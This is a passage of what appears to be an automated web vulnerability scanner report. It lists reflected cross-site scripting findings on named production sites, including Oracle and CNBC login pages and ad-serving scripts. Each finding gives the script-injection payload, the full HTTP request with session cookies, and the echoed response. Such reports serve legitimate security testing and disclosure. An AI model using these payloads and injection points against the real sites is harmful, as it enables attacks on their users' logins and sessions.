Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=200136460310,1)
Date: Tue, 06 Sep 2011 16:02:10 GMT

<!--*09:02:10*-->
<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
UScd6e262f6e"><script>alert(1)</script>33d02dcf400
_rd_temp_config.js">
...[SNIP]...

3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76780"%3balert(1)//43d7466ae8e was submitted in the p_lang parameter. This input was echoed as 76780";alert(1)//43d7466ae8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780"%3balert(1)//43d7466ae8e HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 18996
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=216172922120704642,1)
Date: Tue, 06 Sep 2011 16:02:12 GMT

<!--*09:02:12*-->
<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "UScd6e276780";alert(1)//43d7466ae8e"</SCRIPT>
...[SNIP]...

3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b161b"-alert(1)-"550e756bc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:23 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321223_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:23 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:23 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 235

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3925"-alert(1)-"281d83ef8c3 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321222_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:22 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 232

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.41. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ae529<script>alert(1)</script>55e88475fb6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F09828ae529<script>alert(1)</script>55e88475fb6 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 16:45:35 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 07 Sep 2011 16:45:35 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F09828AE529<SCRIPT>ALERT(1)</SCRIPT>55E88475FB6" was not recognized.
*/

3.42. https://login.cnbc.com/cas/login [apphome parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the apphome request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5c0"><script>alert(1)</script>0f8cf36ce47 was submitted in the apphome parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:10 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
rm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription">
...[SNIP]...

3.43. https://login.cnbc.com/cas/login [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the jsessionid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9cd"><script>alert(1)</script>792007f2f0 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register">
...[SNIP]...

3.44. https://login.cnbc.com/cas/login [login_view parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the login_view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f224b"><script>alert(1)</script>829e8aaba58 was submitted in the login_view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:11 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88659


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58">
...[SNIP]...

3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55fd4'><script>alert(1)</script>bb9117bee86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&55fd4'><script>alert(1)</script>bb9117bee86=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<iframe name="regFrame" frameborder="0" class="registerFrame" style='height:800px;' scrolling="no" src='https://register.cnbc.com/registerUser.do?iframe=yes&source=register&55fd4'><script>alert(1)</script>bb9117bee86=1'>
...[SNIP]...

3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67364"><script>alert(1)</script>6e7c0304749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:35 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1">
...[SNIP]...

3.47. https://login.cnbc.com/cas/login [service parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the service request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beaf8"><script>alert(1)</script>27bcb15f035 was submitted in the service parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register">
...[SNIP]...

3.48. https://login.cnbc.com/cas/login [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34868"><script>alert(1)</script>3f8471aa8dc was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:32 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 5727
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header">
...[SNIP]...

3.49. https://login.cnbc.com/cas/login [source_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the source_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb331"><script>alert(1)</script>a8ddc251ca7 was submitted in the source_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription">
...[SNIP]...

3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload c1951<script>alert(1)</script>81611ea9517 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ed6751adef14af5029c1951<script>alert(1)</script>81611ea9517 HTTP/1.1
Host: login.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
